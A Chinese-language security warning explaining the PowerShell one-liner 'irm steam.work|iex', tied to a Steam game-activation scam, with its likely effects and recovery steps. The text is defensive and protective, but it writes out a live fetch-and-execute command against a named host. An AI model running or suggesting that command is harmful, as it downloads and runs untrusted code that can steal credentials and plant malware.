一个高风险的恶意命令。
执行此命令将严重危害您的计算机安全和您的 Steam 帐户。
风险分析:irm steam.work|iex
这个命令由三个部分组成,组合起来非常危险:
-
irm steam.work-
irm是Invoke-RestMethod的别名,这是一个 PowerShell 命令。 -
它的功能是访问一个网址(在这里是
steam.work)并下载该网址上的所有内容。在这个场景下,它下载的是一个恶意脚本文件。
-
-
|(管道符)-
这个符号将前一个命令的输出(即下载的恶意脚本内容)直接“传送”给下一个命令作为输入。
-
-
iex-
iex是Invoke-Expression的别名,这是 PowerShell 中最危险的命令之一。 -
它的功能是立即执行它收到的任何文本或脚本。
-
综合起来,这个命令的完整意思是:“从 steam.work 网址下载一个脚本,然后不经过任何检查,立即在您的计算机上执行该脚本。”
⚠️ 具体威胁和后果
这个命令是一种已知的骗局,通常与从未经授权的第三方网站购买廉价 Steam 游戏“激活码”有关。骗子会指示您运行此命令来“激活”游戏。
一旦执行,该恶意脚本会做以下事情:
-
修改 Steam 客户端: 脚本会篡改您本地的 Steam 程序文件。
-
劫持连接: 它会将您的 Steam 客户端连接重定向到一个盗版服务器,而不是官方的 Steam 服务器。这会使您“看起来”似乎在库中拥有了该游戏,但实际上这不是一个合法的副本,它没有绑定到您的帐户。
-
安装恶意软件: 这是最大的风险。由于该脚本在您的计算机上拥有完全的执行权限,它极有可能在后台执行其他恶意操作,例如:
-
添加防火墙或杀毒软件(如 Windows Defender)的白名单,使其后续的恶意行为不会被检测到。
-
下载并安装更多的恶意软件,如病毒、木马、间谍软件或勒索软件。
-
窃取您的 Steam 帐户凭据,或浏览器中保存的其他密码。
-
如果您已经执行了此命令
如果您不慎运行了此命令,请立即采取以下措施来保护您的计算机和帐户:
-
断开网络连接: 立即拔掉网线或断开 Wi-Fi,以阻止恶意软件进一步通信。
-
更改 Steam 密码: 立即在另一台干净的设备(如您的手机)上更改您的 Steam 帐户密码,并启用 Steam 令牌(双因素认证)。
-
登出所有设备: 在 Steam 的帐户设置中,选择“取消对所有其他设备的授权”。
-
彻底卸载 Steam: 仅仅卸载程序可能不够。您需要进入
C:\Program Files (x86)\Steam(或您的安装目录)并手动删除整个 Steam 文件夹,以确保所有被修改的文件都被清除。 -
运行安全扫描: 重新连接网络后,立即使用 Windows Defender 或其他可靠的杀毒软件(如 Malwarebytes)进行全盘扫描。
-
检查白名单(重要):
-
打开 Windows Defender(Windows 安全中心)。
-
转到“病毒和威胁防护” -> “管理设置”。
-
向下滚动到“排除项”,点击“添加或删除排除项”。
-
检查是否有任何可疑的文件夹(尤其是您的 Steam 文件夹)被添加到了排除列表中。 如果有,请立即将其删除。
-
-
考虑重装系统: 鉴于
iex的危险性,您无法100%确定恶意脚本都做了什么。最安全、最彻底的解决方案是备份您的重要文件(非程序文件),并完全重新安装 Windows 操作系统。